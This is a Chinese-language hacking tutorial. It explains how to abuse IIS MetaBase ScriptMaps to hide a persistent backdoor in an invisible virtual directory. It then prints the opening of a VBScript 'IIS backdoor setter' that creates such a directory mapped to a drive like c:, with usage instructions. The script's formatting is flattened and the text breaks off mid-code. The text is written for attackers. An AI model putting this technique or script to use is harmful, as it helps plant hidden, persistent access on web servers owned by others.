脚本图片类后门病毒的完美使用方法

核心提示： 其中有一个值：ScriptMaps，代表脚本映射，脚本图片类后门病毒的完美使用方法(3)，当我们在某个虚拟目录下设定ScriptMaps值后，则向该目录请求的特定扩展名的文件都会交给指定的ISAPI执行，保存为iis.vbs： 代码 help1=IIS后门设置器 FOR WIN2000 B

其中有一个值：ScriptMaps，代表脚本映射。当我们在某个虚拟目录下设定ScriptMaps值后，则向该目录请求的特定扩展名的文件都会交给指定的ISAPI执行。需要强调的是，设定ScriptMaps的目录并不一定要真实存在的，只要在MetaBase中某个HTTP实例的root键下建了一个子键，对该字键同名的虚拟目录的HTTP请求IIS会认为是合法的，并会交由映射的ISAPI处理。

这样说可能谁都晕了（包括我），其实简单的作个类比：MetaBase的就够类似于注册表，我们知道，我们在安装有些程序的时候，安装程序会在注册表中建立一些必要的值，可我们一旦非正规把它安装的文件删除了时（比如有些朋友删游戏时就是直接往回收站一拉了事），注册表中的那些项就会被留下，没有用处，而造成注册表垃圾。MetaBase中也是那么回事，我们正常建立一个虚拟目录时，MetaBase中就会建立一些项。而当我们通过非正常手段删除了此虚拟目录时，那些项就会留下，与注册表不同的是，那些项还会起作用，只要我们用http请求了那个虚拟目录，IIS就会依旧按照MetaBase中的原来的虚拟目录设置顺利返回。

所以即使目录不存在，只要他曾经存在过，那么就成立。呵呵，听懂了没？（PS：还没懂）晕，那就只好请您看动鲨的那篇文章了，他说得可比我清楚。 至于如何添加不可见的虚拟目录，动鲨的那篇文章说得很清楚了，我这里就不废话了，下面提供动鲨的添加不可见虚拟目录的脚本，保存为iis.vbs： 代码 help1=IIS后门设置器 FOR WIN2000 BY 动鲨 5月30号2004 年 help2=请输入正确的虚拟目录名称和映射的路径,格式如下 help3= cscript.exe iis.vbs 虚拟目录的名称 映射的路径 help4=例如: cscript.exe iis.vbs backdoor c: set Args = Wscript.Arguments if args.count < 2 then wscript.echo help1 wscript.echo wscript.echo help2 wscript.echo wscript.echo help3 wscript.echo wscript.echo help4 wscript.quit end if strVRName=args(0) 虚拟目录名称 strRootPath=args(1) 虚拟目录路径 Set checkVirtualDir=GetObject(IIS://LocalHost/W3SVC/1/Root) For each VR in checkVirtualDir if VR.Name=lhxy Then foundt =yes else foundt= no End If Next if foundt =yes then wscript.echo 发现已经创建了lhxy目录，正在设置自定义的虚拟目录 creatvdir else wscript.echo 正在创建lhxy目录，以及自定义文件夹，请等待！